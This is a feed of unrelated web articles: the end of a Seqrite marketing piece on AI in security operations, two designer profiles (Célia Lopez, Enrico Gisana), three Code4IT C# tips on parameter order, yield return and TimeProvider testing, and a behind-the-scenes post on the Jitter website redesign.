    Traditional SOCs struggle with tool sprawl. Seqrite provides a unified architecture with centralized management, reducing complexity and cutting TCO by up to 47% (industry benchmarks).


    The Future: Predictive & Agentic AI in SecOps

    • Predictive AI: Anticipates breaches before they occur by analyzing historical + real-time telemetry.

    • Causal AI: Maps cause-effect relationships in attacks, helping SOCs understand root causes, not just symptoms.

    • Agentic AI: Autonomous agents will investigate and remediate incidents without human intervention, allowing SOC teams to focus on strategy.

    Conclusion: AI Is No Longer Optional

    Cybercriminals are already using AI to scale attacks. Without AI in SecOps, organizations risk falling hopelessly behind.

    The benefits are clear:

    • Faster detection (minutes vs weeks)

    • Reduced false positives (by up to 60%)

    • Automated containment (minutes vs hours)

    • Continuous compliance readiness

    AI is not replacing SecOps teams—it’s the missing shield that makes them unbeatable.




  • Reality meets Emotion: The 3D Storytelling of Célia Lopez

    Reality meets Emotion: The 3D Storytelling of Célia Lopez


    Hi, my name is Célia. I’m a French 3D designer based in Paris, with a special focus on color harmony, refined details, and meticulous craftsmanship. I strive to tell stories through groundbreaking interactivity and aim to create designs that truly touch people’s hearts. I collaborate with renowned agencies and always push for exemplary quality in everything I do. I love working with people who share the same dedication and passion for their craft—because that’s when results become something we can all be truly proud of.

    Featured Projects

    Aether1

    This project was carried out with the OFF+BRAND team, with whom I’ve collaborated regularly since February 2025. They wanted to use this product showcase to demonstrate to their future clients how brilliantly they combine storytelling, WebGL, AI integration, and a highly polished, flawlessly coded UI.

    I loved working on this project not only because of the intense team effort in fine-tuning the details, but also because of the creative freedom I was given. In collaboration with Gilles Tossoukpé and Ross Anderson, we built the concept entirely from scratch, each bringing our own expertise. I’m very proud of the result.

    We have done a full case study explaining our workflow on Codrops

    aether1.ai

    My collaboration with OFF+BRAND began thanks to a recommendation from Paul Guilhem Repaux, with whom I had worked on one of the biggest projects of my career: the Dubai World Expo.

    Dubai World Expo

    We recreated over 200 pavilions from 192 countries, delivering a virtual experience for more than 2 million viewers during the inauguration of the Dubai World Expo in 2020.

    This unique experience allowed users to attend countless events, conferences, and performances without traveling to Dubai.

    To bring this to life, we worked as a team of six 3D designers and two developers, under the leadership of the project manager at DOGSTUDIO. I’m truly proud to have contributed to this website, which showcased one of the world’s most celebrated events.

    virtualexpodubai.com/

    Heidelberg CCUS

    The following website was created with Ashfall Studio, another incredible studio whose meticulous work, down to the way they present their projects, inspires me tremendously.

    Here, our mission was nothing short of magic: transforming a website with a theme that, at first glance, wasn’t exactly appealing—tar production—into an experiential site that evokes emotion! I mean, come on, we actually managed to make tar sexy!

    ccus.heidelbergmaterials.com/en/

    Jacquemus

    Do you know the law of attraction? This principle is based on the idea that we can attract what we focus our attention and emotions on. I fell in love with the Jacquemus brand—the story of Simon, its creator, resonates deeply with me because we both grew up in the same place: the beautiful South of France!

    I wanted to create a project for Jacquemus, so I first made it a personal one. I wanted to explore the bridges between reality, 3D, photography, and motion design in one cohesive whole—which you can actually see on my Instagram, where I love mixing 3D and fashion in a harmonious and colorful feed.

    I went to their boutique on Avenue Montaigne and integrated my bag into the space using virtual reality. I also created a motion piece and did a photoshoot with a photographer.

    Céramique

    Last year, a friend of mine gave me a ceramics workshop where I created plates and cups. I loved it! Then in 2025, I decided I wanted to improve my animation skills—so I needed a subject to practice on. I was inspired by that workshop and created a short animation based on the steps involved in making my cups.

    Philosophy

    Are you one of those people who dream big—sometimes too big—and, once they commit to something, push it to the extreme of what it could become? Well, I am. If I make a ceramic plate once, I want to launch my own brand. If I invest in real estate, I want to become financially independent. If I spend my life in stylish cafés or designer gyms I discover on ClassPass, I start imagining opening a coffee shop–fitness space. When I see excellence somewhere, I think: why not me? And I give myself the means to reach my goals. But of course, one has to be realistic: to be truly high-quality, you need to focus on one thing at a time. So yes, I have many future projects—but first, let’s finish the ones already in progress.

    My next steps

    I recently launched my Airbnb in Paris, for which I’ll be creating some content, building a brand identity, and promoting it as much as I can.

    I’ve also launched my lifestyle/furniture brand called LABEGE, named after the village where I grew up. For now, it’s a digital brand, but my goal is to develop it for commercialization. I have no idea how to make that happen just yet.

    Background & Career highlights


    Awwwards class

    There have been many defining moments in my career—or at least, I treat every opportunity as a potential turning point, which is why I invest so much in every project.

    But two moments, in particular, stand out for me. The first was when Awwwards invited me to create a course explaining my 3D WebGL workflow. Today, I might update it with some new insights, but at the time it was extremely valuable because there was nothing like it available online. Combined with the fact that it was one of the first four courses they launched, it gave me great visibility within our community.

    My Awwwards Class

    Spline

    Another milestone was when I joined the Spline team. Back then, the software was still unstable—it was frustrating to spend days creating only to lose all my work to a bug. But over time, the tool became incredibly powerful. The combination of Spline’s excellent social media presence and the growing strength of the software helped it grow from 5K to 75K Twitter followers in just two years, along with thousands of new users.

    Thanks to the tool’s early popularity and the small number of people who mastered it at first, I was able to build a strong reputation in the interactive 3D web field. I shared a lot about Spline on my social channels and even launched a YouTube channel dedicated to tutorials.

    It was fascinating to see how a tool is built, showcase new features to the community, and watch the enthusiasm grow. Being part of such a close-knit, human team—led by founder Alejandro, whose visionary talent inspires me—was an unforgettable experience.

    Tools & Techniques

    • Cinema 4D
    • Redshift
    • Blender
    • Figma
    • Pinterest
    • Marvelous Designer
    • Spline Tool
    • PeachWeb

    Final Thoughts

    Life is short—know your limits and your worth. Set non-negotiable boundaries with anything or anyone that drags you down: no second chances, no comebacks. Be good to people and to the world, but also be selfish in the best way—do what makes you feel alive, happy, and full of magic. Surround yourself with people who are worth your attention, who value you as much as you value them.

    Put yourself in the main role of your own life, dream big, and be grateful to be here.

    LOVE!

    Contact

    Thanks a lot for taking the time to read about me!

    Let’s connect!

    Instagram
    X (Twitter)
    LinkedIn
    Email for new inquiries: hello@celialopez.fr 💌






  • Keep the parameters in a consistent order | Code4IT

    Keep the parameters in a consistent order | Code4IT


    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost.

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ads as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    If you have a set of related functions, always use a coherent order of parameters.

    Take this bad example:

    IEnumerable<Section> GetSections(Context context);
    
    void AddSectionToContext(Context context, Section newSection);
    
    void AddSectionsToContext(IEnumerable<Section> newSections, Context context);
    

    Notice the order of the parameters passed to AddSectionToContext and AddSectionsToContext: they are swapped!

    Quite confusing, isn’t it?

    Confusion intensifies

    For sure, the code is harder to understand, since the order of the parameters is not what the reader expects it to be.

    But, even worse, this issue may lead to hard-to-find bugs, especially when parameters are of the same type.

    Think of this example:

    IEnumerable<Item> GetPhotos(string type, string country);
    
    IEnumerable<Item> GetVideos(string country, string type);
    

    Well, what could possibly go wrong?!?

    We have two ways to prevent possible issues:

    1. use coherent order: for instance, type is always the first parameter
    2. pass objects instead: you’ll add a bit more code, but you’ll prevent those issues
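The second option can be sketched like this. The `MediaQuery` record, the `Catalog` class, and its sample data are illustrative stand-ins, not part of the original API — the point is only that both methods take the same single type, so there is no argument order left to swap:

```csharp
using System;
using System.Collections.Generic;
using System.Linq;

// Call sites read the same way for both methods: no order to remember.
var photos = Catalog.GetPhotos(new MediaQuery(Type: "landscape", Country: "IT"));
var videos = Catalog.GetVideos(new MediaQuery(Type: "landscape", Country: "IT"));

Console.WriteLine(string.Join(", ", photos)); // photo/landscape/IT
Console.WriteLine(string.Join(", ", videos)); // video/landscape/IT

// Hypothetical parameter object bundling the two strings from the
// GetPhotos/GetVideos example above.
public record MediaQuery(string Type, string Country);

public static class Catalog
{
    // Sample data standing in for a real data source.
    private static readonly (string Kind, string Type, string Country)[] Items =
    {
        ("photo", "landscape", "IT"),
        ("photo", "portrait",  "FR"),
        ("video", "landscape", "IT"),
    };

    public static IEnumerable<string> GetPhotos(MediaQuery q) =>
        Items.Where(i => i.Kind == "photo" && i.Type == q.Type && i.Country == q.Country)
             .Select(i => $"{i.Kind}/{i.Type}/{i.Country}");

    public static IEnumerable<string> GetVideos(MediaQuery q) =>
        Items.Where(i => i.Kind == "video" && i.Type == q.Type && i.Country == q.Country)
             .Select(i => $"{i.Kind}/{i.Type}/{i.Country}");
}
```

As a bonus, a parameter object gives you one obvious place to add validation or new filters later, without touching every signature.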

    To read more about this code smell, check out this article by Maxi Contieri!

    This article first appeared on Code4IT

    Conclusion

    To recap, always pay attention to the order of the parameters!

    • keep them always in the same order
    • use easy-to-understand order (remember the Principle of Least Surprise?)
    • use objects instead, if necessary.

    👉 Let’s discuss it on Twitter or in the comment section below!

    🐧






  • use yield return to return one item at a time | Code4IT

    use yield return to return one item at a time | Code4IT


    Yield is a keyword that allows you to return one item at a time instead of creating a full list and returning it as a whole.


    To me, yield return has always been one of the most difficult things to understand.

    Now that I’ve understood it (not thoroughly, but enough to explain it), it’s my turn to share my learnings.

    So, what does yield return mean? How is it related to collections of items?

    Using Lists

    Say that you’re returning a collection of items and that you need to iterate over them.

    A first approach could be creating a list with all the items, returning it to the caller, and iterating over the collection:

    IEnumerable<int> WithList()
    {
        List<int> items = new List<int>();
    
        for (int i = 0; i < 10; i++)
        {
            Console.WriteLine($"Added item {i}");
            items.Add(i);
        }
    
        return items;
    }
    
    void Main()
    {
        var items = WithList();
    
        foreach (var i in items)
        {
            Console.WriteLine($"This is Mambo number {i}");
        }
    }
    

    This snippet creates the whole collection and then prints the values inside that list. On the console, you’ll see this text:

    Added item 0
    Added item 1
    Added item 2
    Added item 3
    Added item 4
    Added item 5
    Added item 6
    Added item 7
    Added item 8
    Added item 9
    This is Mambo number 0
    This is Mambo number 1
    This is Mambo number 2
    This is Mambo number 3
    This is Mambo number 4
    This is Mambo number 5
    This is Mambo number 6
    This is Mambo number 7
    This is Mambo number 8
    This is Mambo number 9
    

    This means that, if you need to operate over a collection with 1 million items, at first you’ll create ALL the items, and then you’ll perform operations on each of them. This approach has two main disadvantages: it’s slow (especially if you only need to work with a subset of those items), and occupies a lot of memory.

    With Yield

    We can use another approach: use the yield return keywords:

    IEnumerable<int> WithYield()
    {
        for (int i = 0; i < 10; i++)
        {
            Console.WriteLine($"Returning item {i}");
    
            yield return i;
        }
    }
    
    void Main()
    {
        var items = WithYield();
    
        foreach (var i in items)
        {
            Console.WriteLine($"This is Mambo number {i}");
        }
    }
    

    With this method, the order of messages is different:

    Returning item 0
    This is Mambo number 0
    Returning item 1
    This is Mambo number 1
    Returning item 2
    This is Mambo number 2
    Returning item 3
    This is Mambo number 3
    Returning item 4
    This is Mambo number 4
    Returning item 5
    This is Mambo number 5
    Returning item 6
    This is Mambo number 6
    Returning item 7
    This is Mambo number 7
    Returning item 8
    This is Mambo number 8
    Returning item 9
    This is Mambo number 9
    

    So, instead of creating the whole list, we create one item at a time, and only when needed.
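The "only when needed" part pays off most when the caller stops early: combined with LINQ, the iterator body simply never runs for the items nobody asks for. A small sketch — the `produced` counter is only there to demonstrate how many items actually get generated:

```csharp
using System;
using System.Collections.Generic;
using System.Linq;

int produced = 0;

// Local iterator function: could yield a million items, but won't have to.
IEnumerable<int> Numbers()
{
    for (int i = 0; i < 1_000_000; i++)
    {
        produced++;
        yield return i;
    }
}

// Take(3) pulls exactly three items, then stops enumerating.
var firstThree = Numbers().Take(3).ToList();

Console.WriteLine(produced); // 3
```

Only three iterations of the loop body ever execute; with the list-based approach from the first snippet, all one million items would have been created up front.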

    Benefits of Yield

    As I said before, there are several benefits with yield: the application is more performant when talking about both the execution time and the memory usage.

    It’s like an automatic iterator: every time you get a result, the iterator advances to the next item.

    Just a note: yield works only for methods that return IAsyncEnumerable<T>, IEnumerable<T>, IEnumerable, IEnumerator<T>, or IEnumerator.

    You cannot use it with a method that returns, for instance, List<T>, because, as the error message says,

    The body of X cannot be an iterator block because List<int> is not an iterator interface type

    Cannot use yield return with lists

    A real use case

    If you use NUnit as a test suite, you’ve probably already used this keyword.

    In particular, when using the TestCaseSource attribute, you specify the name of the class that outputs the test cases.

    public class MyTestClass
    {
        [TestCaseSource(typeof(DivideCases))]
        public void DivideTest(int n, int d, int q)
        {
            Assert.AreEqual(q, n / d);
        }
    }
    
    class DivideCases : IEnumerable
    {
        public IEnumerator GetEnumerator()
        {
            yield return new object[] { 12, 3, 4 };
            yield return new object[] { 12, 2, 6 };
            yield return new object[] { 12, 4, 3 };
        }
    }
    

    When executing the tests, an iterator returns a test case at a time, without creating a full list of test cases.

    The previous snippet is taken directly from NUnit’s documentation for the TestCaseSource attribute, which you can find here.

    Wrapping up

    Yes, yield is a quite difficult keyword to understand.

    To read more, head to the official docs.

    Another good resource is “C# – Use yield return to minimize memory usage” by Makolyte. You should definitely check it out!

    And, if you want, check out the conversation I had about this keyword on Twitter.

    Happy coding!

    🐧






  • injecting and testing the current time with TimeProvider and FakeTimeProvider | Code4IT

    injecting and testing the current time with TimeProvider and FakeTimeProvider | Code4IT



    Things that depend on concrete stuff are difficult to use when testing. Think of the file system: to have tests work properly, you have to ensure that the file system is structured exactly as you are expecting it to be.

    A similar issue occurs with dates: if you create tests based on the current date, they will fail the next time you run them.

    In short, you should find a way to abstract these functionalities, to make them usable in the tests.

    In this article, we are going to focus on the handling of dates: we’ll learn what the TimeProvider class is, how to use it and how to mock it.

    The old way for handling dates: a custom interface

    Back in the day, the most straightforward approach to adding abstraction around date management was to manually create an interface, or an abstract class, to wrap access to the current date:

    public interface IDateTimeWrapper
    {
      DateTime GetCurrentDate();
    }
    

    Then, the standard implementation implemented the interface by using only the UTC date:

    public class DateTimeWrapper : IDateTimeWrapper
    {
      public DateTime GetCurrentDate() => DateTime.UtcNow;
    }
    

    A similar approach is to have an abstract class instead:

    public abstract class DateTimeWrapper
    {
      public virtual DateTime GetCurrentDate() => DateTime.UtcNow;
    }
    

    Easy: you then have to add an instance of it in the DI engine, and you are good to go.

    The only problem? You have to do it for every project you are working on. Quite a waste of time!

    How to use TimeProvider in a .NET application to get the current date

    Along with .NET 8, the .NET team released an abstract class named TimeProvider. This abstract class, beyond providing an abstraction for local time, exposes methods for working with high-precision timestamps and TimeZones.

    It’s important to note that dates are returned as DateTimeOffset instances, not as DateTime.

    TimeProvider is available out of the box in a .NET console application, accessible as a singleton:

    static void Main(string[] args)
    {
      Console.WriteLine("Hello, World!");
      
      DateTimeOffset utc = TimeProvider.System.GetUtcNow();
      Console.WriteLine(utc);
    
      DateTimeOffset local = TimeProvider.System.GetLocalNow();
      Console.WriteLine(local);
    }
    

    If, instead, you need to use Dependency Injection, for example in .NET APIs, you have to register it as a singleton, like this:

    builder.Services.AddSingleton(TimeProvider.System);
    

    So that you can use it like this:

    public class SummerVacationCalendar
    {
      private readonly TimeProvider _timeProvider;
    
      public SummerVacationCalendar(TimeProvider timeProvider)
      {
        this._timeProvider = timeProvider;
      }
    
      public bool ItsVacationTime()
      {
        var today = _timeProvider.GetLocalNow();
        return today.Month == 8;
      }
    }
    

    How to test TimeProvider with FakeTimeProvider

    Now, how can we test the ItsVacationTime method of the SummerVacationCalendar class?

    We can use the Microsoft.Extensions.TimeProvider.Testing NuGet library, also from Microsoft, which provides a FakeTimeProvider class that acts as a stub for the TimeProvider abstract class:

    TimeProvider.Testing NuGet package

    By using the FakeTimeProvider class, you can set the current UTC and Local time, as well as configure the other options provided by TimeProvider.

    Here’s an example:

    [Fact]
    public void WhenItsAugust_ShouldReturnTrue()
    {
     // Arrange
      var fakeTime = new FakeTimeProvider();
      fakeTime.SetUtcNow(new DateTimeOffset(2025, 8, 14, 22, 24, 12, TimeSpan.Zero));
      var sut = new SummerVacationCalendar(fakeTime);
    
     // Act
      var isVacation = sut.ItsVacationTime();
    
     // Assert
      Assert.True(isVacation);
    }
    
    [Fact]
    public void WhenItsNotAugust_ShouldReturnFalse()
    {
     // Arrange
      var fakeTime = new FakeTimeProvider();
      fakeTime.SetUtcNow(new DateTimeOffset(2025, 3, 14, 22, 24, 12, TimeSpan.Zero));
      var sut = new SummerVacationCalendar(fakeTime);
    
     // Act
      var isVacation = sut.ItsVacationTime();
    
     // Assert
      Assert.False(isVacation);
    }
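Beyond setting an absolute time, FakeTimeProvider can also move its clock forward in place with the Advance method, which helps when a single test needs to cross a time boundary. A sketch reusing the same SummerVacationCalendar class (note that FakeTimeProvider’s local time zone defaults to UTC, so local time matches the UTC value we set):

```csharp
[Fact]
public void WhenTimeAdvancesIntoAugust_ShouldFlipToTrue()
{
  // Arrange: one hour before midnight on July 31st, UTC
  var fakeTime = new FakeTimeProvider();
  fakeTime.SetUtcNow(new DateTimeOffset(2025, 7, 31, 23, 0, 0, TimeSpan.Zero));
  var sut = new SummerVacationCalendar(fakeTime);

  // Still July: not vacation time yet
  Assert.False(sut.ItsVacationTime());

  // Act: move the fake clock forward two hours, into August 1st
  fakeTime.Advance(TimeSpan.FromHours(2));

  // Assert
  Assert.True(sut.ItsVacationTime());
}
```

Unlike SetUtcNow, Advance shifts the clock relative to its current value, which reads naturally in tests that simulate the passage of time.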
    

    Further readings

    Actually, TimeProvider provides far more functionality than just returning the UTC and the local time.

    Maybe we’ll explore them in the future. But for now, do you know how the DateTimeKind enumeration impacts the way you create new DateTimes?

    🔗 C# tip: create correct DateTimes with DateTimeKind | Code4IT

    This article first appeared on Code4IT 🐧

    However, always remember to test the code not against the actual time but against static values. And if, for some reason, you cannot add TimeProvider to your classes, there are other, less intrusive strategies you can use (which also work for other types of dependencies, like the file system):

    🔗 3 ways to inject DateTime and test it | Code4IT

    Wrapping up

    I hope you enjoyed this article! Let’s keep in touch on LinkedIn, Twitter or BlueSky! 🤜🤛

    Happy coding!

    🐧






  • Design as Rhythm and Rebellion: The Work of Enrico Gisana

    Design as Rhythm and Rebellion: The Work of Enrico Gisana


    My name is Enrico Gisana, and I’m a creative director, graphic and motion designer.

    I’m the co-founder of GG—OFFICE, a small independent visual arts studio based in Modica, Sicily. I consider myself a multidisciplinary designer because I bring together different skills and visual languages. I work across analog and digital media, combining graphic design, typography, and animation, often blending these elements through experimental approaches. My design approach aims to push the boundaries of traditional graphic conventions, constantly questioning established norms to explore new visual possibilities.

    My work mainly focuses on branding, typography, and motion design, with a particular emphasis on kinetic typography.

    Between 2017 and 2025, I led numerous graphic and motion design workshops at various universities and art academies in Italy, including Abadir (Catania), Accademia di Belle Arti di Frosinone, Accademia di Belle Arti di Roma, CFP Bauer (Milan), and UNIRSM (San Marino). Since 2020, I’ve been teaching motion design at Abadir Academy in Catania, and since 2025, kinetic typography at CFP Bauer in Milan.

    Featured work

    TYPEXCEL — Variable font

    I designed an online half-day workshop for high school students on the occasion of an open day at the Academy of Design and Visual Communication Abadir, held in 2021.

    The goal of this workshop was to create a first contact with graphic design, but most of all with typography, using an Excel spreadsheet as a modular grid composed of editable and variable cells, instead of professional software which requires specific knowledge.

    The cell pattern allowed the students to create letters, icons, and glyphs. It was a stimulating exercise that helped them discover and develop their own design and creative skills.

    This project was published in Slanted Magazine N°40 “Experimental Type”.

    DEMO Festival

    DEMO Festival (Design in Motion Festival) is one of the world’s most prominent motion design festivals, founded by the renowned Dutch studio Studio Dumbar. The festival takes over the entire digital screen network of Amsterdam Central Station, transforming public space into a 24-hour exhibition of cutting-edge motion work from around the globe.

    I’ve had the honor of being selected multiple times to showcase my work at DEMO: in 2019 with EYE SEQUENCE; in 2022 with ALIEN TYPE and VERTICAL; and again in 2025 with ALIEN TRIBE, HELLOCIAOHALLOSALUTHOLA, and FREE JAZZ.

    In the 2025 edition, ALIEN TRIBE and HELLOCIAOHALLOSALUTHOLA were also selected for the Special Screens program, which extended the festival’s presence beyond the Netherlands. These works were exhibited in digital spaces across cities including Eindhoven, Rotterdam, Tilburg, Utrecht, Hamburg, and Düsseldorf, reaching a broader international audience.

    MARCO FORMENTINI

    My collaboration with Italian footwear designer Marco Formentini, based in Amsterdam, began with the creation of his visual identity and gradually expanded into other areas, including apparel experiments and the design of his personal website.

    Each phase of the project reflects his eclectic and process-driven approach to design, while also allowing me to explore form, texture, and narrative through different media.

    Below is a closer look at the three main outputs of this collaboration: logo, t-shirt, and website.

    Logo

    Designed for Italian footwear designer Marco Formentini, this logo reflects his broad, exploratory approach to design. Rather than sticking to a traditional monogram, I fused the letters “M” and “F” into a single, abstract shape, something that feels more like a symbol than a set of initials. The result is a wild, otherworldly mark that evokes movement, edge, and invention, mirroring Marco’s ability to shift across styles and scales while always keeping his own perspective.

    Website

    I conceived Marco Formentini’s website as a container, a digital portfolio without a fixed structure. It gathers images, sketches, prototypes, and renderings not through a linear narrative but through a visual flow that embraces randomness.

    The layout is split into two vertical columns, each filled with different types of visual content. By moving the cursor left or right, the columns dynamically resize, allowing the user to shift focus and explore the material in an intuitive and fluid way. This interactive system reflects Marco’s eclectic approach to footwear design, a space where experimentation and process take visual form.

    Website development by Marco Buccolo.

    Check it out: marco-formentini.com

    T—Shirt

    Shortly after working on his personal brand, I shared with Marco Formentini a few early graphic proposals for a potential t-shirt design, while he happened to be traveling through the Philippines with his friend Jo.

    Without waiting for a full release, he spontaneously had a few pieces printed at a local shop he stumbled upon during the trip, mixing one of the designs on the front with a different proposal on the back. An unexpected real-world test run for the identity, worn into the streets before even hitting the studio.

    Ditroit

    This poster was created to celebrate the 15th anniversary of Ditroit, a motion design and 3D studio based in Milan.

    At the center is an expressive “15”, a tribute to the studio’s founder, a longtime friend and former graffiti companion. The design reconnects the present with our shared creative roots and the formative energy of those early years.

    Silver on black: a color pairing rooted in our early graffiti experiments, reimagined here to celebrate fifteen years of visual exploration.

    Tightype

    A series of typographic animations I created for the launch of Habitas, the typeface designed by Tightype and released in 2021.

    The project explores type in motion, not just as a vehicle for content but as a form of visual expression in itself. Shapes bounce, rotate and multiply, revealing the personality of the font through rhythm and movement.

    Jane Machine

    SH SH SH SH is the latest LP from Jane Machine.

    The cover is defined by the central element of the lips, directly inspired by the album’s title. The lips not only mimic the movement of the “sh” sound but also evoke the noise of tearing paper. I amplified this effect through the creative process by first printing a photograph of the lips and then tearing it, introducing a tactile quality that contrasts with and complements the more electronic aesthetic of the colors and typography.

    Background

    I’m a creative director and graphic & motion designer with a strong focus on typography.

    My visual journey started around the age of 12, shaped by underground culture: I was into graffiti, hip hop, breakdancing, and skateboarding.

    As I grew up, I explored other scenes, from punk to tekno, from drum and bass to more experimental electronic music. What always drew me in, beyond the music itself, was the visual world around it: free party flyers, record sleeves, logos, and type everywhere.

    Between 2004 and 2010, I produced tekno music, an experience that deeply shaped my approach to design. That’s where I first learned about timelines, beats, and rhythm, all elements that today are at the core of how I work with motion.

    Art has also played a major role in shaping my visual culture, from the primitive signs of hieroglyphs to Cubism, Dadaism, Russian Constructivism, and the expressive intensity of Antonio Ligabue.

    The aesthetics and attitude of those worlds continue to influence everything I do and how I see things.

    In 2013, I graduated in Graphic Design from IED Milano and started working with various agencies. In 2014, I moved back to Modica, Sicily, where I’m still based today.

    Some of my animation work has been featured at DEMO Festival, the international motion design event curated by Studio Dumbar, in the 2019, 2022, and 2025 editions.

    In 2022, I was published in Slanted Magazine #40 (EXPERIMENTAL TYPE) with TYPEXCEL, a variable font developed for a typography workshop aimed at high school students and built entirely inside an Excel spreadsheet.

    Since 2020, I’ve been teaching Motion Design at Abadir, Academy of Design and Visual Communication in Catania, and in 2025 I started teaching Type in Motion at Bauer in Milan.

    In 2021, together with Francesca Giampiccolo, I founded GG—OFFICE, a small independent visual studio based in Modica, Sicily.

    GG—OFFICE is a design space where branding and motion meet through a tailored and experimental approach. Every project grows from dialogue, evolves through research, and aims to shape contemporary, honest, and visually forward identities.

    In 2025, Francesca and I gave a talk on the theme of madness at Desina Festival in Naples, a wild, fun, and beautifully chaotic experience.

    Design Philosophy

    My approach to design is rooted in thought (I think a lot), as well as in research, rhythm, and an almost obsessive production of drafts.

    Every project is a unique journey where form always follows meaning, and never simply does what the client says.

    This is not about being contrary; it’s about bringing depth, intention and a point of view to the process.

    I channel the raw energy and DIY mindset of the subcultures that shaped me early on. I’m referring to those gritty, sound-driven visual scenes that pushed boundaries and blurred the line between image and sound. I’m not talking about the music itself, but about the visual culture that surrounded it. That spirit still fuels my creative engine today.

    Typography is my playground, not just a visual tool but a way to express structure, rhythm and movement.

    Sometimes I push letterforms to their limit, to the point where they lose readability and become pure visual matter.

    Whether I’m building a brand identity or animating graphics, I’m always exploring new visual languages, narrative rhythms and spatial poetry.

    Tools and Techniques

    I work across analog and digital tools, but most of my design and animation takes shape in Adobe Illustrator, After Effects, InDesign and Photoshop. And sometimes even Excel 🙂, especially when I want to break the rules and rethink typography in unconventional ways.

    I’m drawn to processes that allow for exploration and controlled chaos. I love building visual systems, breaking them apart and reconstructing them with intention.

    Typography, to me, is a living structure, modular, dynamic and often influenced by visual or musical rhythm.

    My workflow starts with in-depth research and a large amount of hand sketching.

    I then digitize the material, print it, manipulate it manually by cutting, collaging and intervening physically, then scan it again and bring it back into the digital space.

    This back-and-forth between mediums helps me achieve a material quality and a sense of imperfection that pure digital work often lacks.

    Inspiration

    Beyond the underground scenes and art movements I mentioned earlier, my inspiration comes from everything around me. I’m a keen observer and deeply analytical. Since I was a kid, I’ve been fascinated by people’s gestures, movements, and subtle expressions.

    For example, when I used to go to parties, I would often stand next to the DJ, not just to watch their technique, but to study their body language, movements, and micro-expressions. Even the smallest gesture can spark an idea.

    I believe inspiration is everywhere. It’s about being present and training your eye to notice the details most people overlook.

    Future Goals

    I don’t have a specific goal or destination. My main aim is to keep doing things well and to never lose my curiosity. For me, curiosity is the fuel that drives creativity and growth, so I want to stay open, keep exploring, and enjoy the process without forcing a fixed outcome.

    Message to Readers

    Design is not art!

    Design is method, planning, and process. However, that method can, and sometimes should, be challenged, as long as you remain fully aware of what you are doing. It is essential that what you create can be reproduced consistently and, depending on the project, works effectively across different media and formats. I always tell my students that you need to know the rules before you can break them. To do good design, you need a lot of passion and a lot of patience.

    Contact




  • A Behind-the-Scenes Look at the New Jitter Website

    A Behind-the-Scenes Look at the New Jitter Website



    If Jitter isn’t on your radar yet, it’s a motion design tool for creative teams that makes creating animated content, from social media assets and ads to product animations and interface mockups, easy and fun.

    Think of it as Figma meets After Effects: intuitive, collaborative, and built for designers who want to bring motion into their workflows without the steep learning curve of traditional tools.

    Why We Redesigned Our Website

    Our previous site had served us well, but it had remained mostly unchanged since we launched Jitter nearly two years ago. The old website focused heavily on the product’s features but didn’t really communicate its value and use cases. In 2025, we decided it was time for a full refresh.

    The main goal? Not just to highlight what Jitter does, but to articulate why it changes the game for motion design.

    We’ve had hundreds of conversations with creative professionals, from freelancers and brand designers to agencies and startups, and heard four key benefits mentioned consistently:

    1. Ease of use
    2. Creativity
    3. Speed
    4. Collaboration

    These became the pillars of the new site experience.

    We also wanted to make room for growth: a more cohesive brand, better storytelling, real-world customer examples, and educational content to help teams get the most out of Jitter.

    Another major shift was in our audience. The first version of the website spoke to every designer, highlighting simplicity and familiarity. But as the product evolved, it became clear that Jitter shines the most when used collaboratively across teams. The new website reflects that focus.

    Shaping Our Positioning

    We didn’t define our “how, what, and why” in isolation. Throughout 2024, we spoke to dozens of creative teams, studios, and design leaders, and listened closely.

    We used this ongoing feedback to shape the way we talk about Jitter ourselves: which problems it solves, where it fits in the design workflow, and why teams love it. The new website is a direct result of that research.

    At the same time, we didn’t want Jitter to feel too serious or corporate. Even though it’s built for teams, we aimed to keep the brand light, fun, and relatable. Motion design should be exciting, not intimidating, and we wanted that to come through in the way Jitter sounds and feels.

    Designing With Jitter

    We also walked the talk, using Jitter to design all animations and prototype every interaction across the new site.

    From menu transitions to the way cards animate on scroll, all micro-interactions were designed in Jitter. It gave us speed, clarity, and a single source of truth, and eliminated a lot of the back-and-forth in the handoff process.

    Our development partners at Antinomy Studio and Ingamana used Jitter too. They prototyped transitions and UI motion directly in the tool to validate ideas and communicate back to our team. It was great to see developers using motion as a shared language, not a handoff artifact.

    Building Together with Antinomy Studio

    The development of the new site was handled in collaboration with the talented team at Antinomy Studio.

    The biggest technical challenge was the large horizontal scroll experience on the homepage. It needed to feel natural, responsive, and smooth across devices, and maintain high performance without compromising on the visuals.

    The site was built using React and GSAP for complex, timeline-based animations and transitions.

    “The large horizontal scroll was particularly complicated and required significant responsive changes. Instead of defining overly complex timelines where screen width values would change the logic of the animation in JavaScript, we used progress values as CSS variables. This allowed us to use calc() functions to translate and scale elements, while the GSAP timeline only updates values from 0 to 1. So easy to understand and maintain!”

    — Baptiste Briel, Antinomy
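    Stripped of GSAP specifics, the core of that approach can be sketched in a few lines. The snippet below is a hypothetical illustration (function and variable names are my own, not Antinomy’s actual code): JavaScript only produces a clamped 0-to-1 progress value and writes it to a CSS custom property, while all the screen-width-dependent math stays in the stylesheet via calc().

```javascript
// Sketch of the "progress as a CSS variable" technique (illustrative only).
// JavaScript computes a single number between 0 and 1; the responsive
// translate/scale math lives entirely in CSS.

// Map an absolute scroll position to a clamped 0–1 progress value.
function scrollProgress(scrollY, start, end) {
  const t = (scrollY - start) / (end - start);
  return Math.min(1, Math.max(0, t));
}

// In the browser, a GSAP timeline or scroll listener would then do no more than:
//
//   document.documentElement.style.setProperty('--progress', String(p));
//
// while the stylesheet handles breakpoints on its own terms:
//
//   .track {
//     transform: translateX(calc(var(--progress) * -300vw));
//   }
```

    Because the tween never encodes pixel values, resizing the viewport changes the CSS math but not the animation logic, which is exactly the maintainability win described in the quote.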

    “We’ve promoted the use of CSS as much as possible for high-performance hover effects and transitions. We’ve even used the new linear() easing functions to bring a bouncy feeling to our CSS animations.

    There’s a great tool created by Jake Archibald for generating spring-like CSS easing functions that you can paste as CSS variables. It’s so much fun to play with, and it’s also something that the Jitter team has implemented in their software, so it was super easy to review and tweak for both design and engineering teams.

    Jitter animations were exported as Lottie files and integrated directly, making the experience dynamic and lightweight. It’s a modern stack that supports our need for speed and flexibility, both in the frontend and behind the scenes.”

    — Baptiste Briel, Antinomy
